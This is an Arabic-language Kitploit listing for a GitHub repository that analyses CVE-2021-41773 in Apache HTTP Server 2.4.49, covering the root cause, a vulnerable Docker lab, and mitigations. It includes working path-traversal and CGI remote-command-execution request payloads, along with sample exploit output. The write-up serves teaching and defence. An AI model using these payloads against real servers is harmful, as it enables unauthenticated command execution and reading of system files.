Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
APACHE-PATH-TRAVERSAL-RCE-CVE-2021-41773- — تحليل شامل لـ CVE-2021-41773 (خادم Apache HTTP الإصدار 2.4.49)، يتضمن بحثًا في الثغرات الأمنية، واستغلالًا مختبريًا خاضعًا للتحكم، وتطوير دليل إثبات المفهوم، وتحليل السبب الجذري، واستراتيجيات التخفيف للأغراض التعليمية والدفاعية في مجال الأمن. | Kitploit
أدوات/GitHubGitHub/abds059/apache-path-traversal-rce-cve-2021-41773-
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubabds059/apache-path-traversal-rce-cve-2021-41773-

APACHE-PATH-TRAVERSAL-RCE-CVE-2021-41773-

تحليل شامل لـ CVE-2021-41773 (خادم Apache HTTP الإصدار 2.4.49)، يتضمن بحثًا في الثغرات الأمنية، واستغلالًا مختبريًا خاضعًا للتحكم، وتطوير دليل إثبات المفهوم، وتحليل السبب الجذري، واستراتيجيات التخفيف للأغراض التعليمية والدفاعية في مجال الأمن.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

CVE-2021-41773 — Apache HTTP Server 2.4.49 اجتياز المسار / RCE

Apache CVE CVSS Python Docker Lab Only

مشروع بحثي تعليمي. تم إجراء جميع الاختبارات في معمل Docker معزول. لا تستخدمه ضد أي نظام لا تملكه.


ملخص الثغرة

الحقلالتفاصيل
CVE IDCVE-2021-41773
البرنامج المتأثرApache HTTP Server 2.4.49 فقط
نوع الثغرةاجتياز المسار → تنفيذ الأوامر عن بعد
درجة CVSS9.8 (حرجة)
تم الكشف عنهاأكتوبر 2021
تم الإصلاح فيApache 2.4.51

السبب الجذري

يفشل Apache 2.4.49 في تطبيع تسلسلات المسارات المشفرة بعناوين URL (%2e%2e) بشكل صحيح قبل تطبيق قواعد التحكم في الوصول. يسمح هذا للمهاجم بتجاوز جذر الويب. عندما يتم تمكين CGI، فإن توجيه الاجتياز إلى /bin/sh وتوفير أوامر الصدفة عبر نص POST يؤدي إلى تنفيذ الأوامر عن بعد دون مصادقة.


محتويات المستودع

root@kitploit:~
cve-2021-41773-poc/
├── Dockerfile      # حاوية Apache 2.4.49 ضعيفة عمدًا للمعمل
├── exploit.py      # PoC بلغة بايثون — يستخدم مآخذ خام للحفاظ على ترميز %2e
├── SETUP.md        # دليل إعداد المعمل خطوة بخطوة
├── README.md       # هذا الملف
└── report.pdf      # تقرير تطوير الاستغلال الكامل

بداية سريعة

1. بناء وتشغيل الحاوية الضعيفة

root@kitploit:~
docker build -t apache-vuln-2449 .
docker run -d -p 8080:80 --name vuln-apache apache-vuln-2449

2. تشغيل الاستغلال

root@kitploit:~
python3 exploit.py

3. المخرجات المتوقعة

root@kitploit:~
==================================================
 CVE-2021-41773 PoC — Lab Use Only
==================================================
[+] Target reachable — HTTP 200

[*] Path Traversal — Reading /etc/passwd
[*] Status: 403
[-] Blocked (403) — server restrictions in place

[*] RCE — Executing: id
[*] Status: 200
[+] OUTPUT:
uid=1(daemon) gid=1(daemon) groups=1(daemon)

[*] RCE — Executing: whoami
[*] Status: 200
[+] OUTPUT:
daemon

[*] RCE — Executing: hostname
[*] Status: 200
[+] OUTPUT:
e4ccca07bee7

راجع SETUP.md للحصول على تعليمات الإعداد الكاملة واستكشاف الأخطاء وإصلاحها.


كيف يعمل الاستغلال

تقوم مكتبة requests بتطبيع %2e → . قبل الإرسال، مما يعطل الاستغلال (يعيد 400). يستخدم هذا PoC مآخذ خام لإرسال طلب HTTP بايتًا بايت، مع الحفاظ على تسلسل الاجتياز المشفر تمامًا كما يحتاج Apache 2.4.49 لاستقباله.

حمولة اجتياز المسار:

root@kitploit:~
GET /.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1

حمولة RCE:

root@kitploit:~
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
...
echo Content-Type: text/plain; echo; id

يفشل Apache في فك تشفير %2e%2e قبل فحوصات ACL، ويعالج الطلب، ويوجهه عبر CGI، وينفذ نص POST كأمر صدفة.


التخفيف

  • قم بترقية Apache إلى 2.4.51 أو أحدث
  • تعطيل CGI إلا إذا كان ضروريًا
  • لا تستخدم أبدًا Require all granted على /
  • قم بتطبيق التصحيحات الأمنية فور إصدارها

المراجع

  • CVE-2021-41773 — MITRE
  • Apache Security Advisory
  • ExploitDB #50383
  • Rapid7 Analysis
  • PayloadsAllTheThings

المؤلف

Abdur Rehman Siddiqui
تطوير الاستغلال — المهمة 3


هذا المستودع لأغراض تعليمية فقط. المؤلف غير مسؤول عن أي إساءة استخدام لهذه المادة.

تنزيل الأداة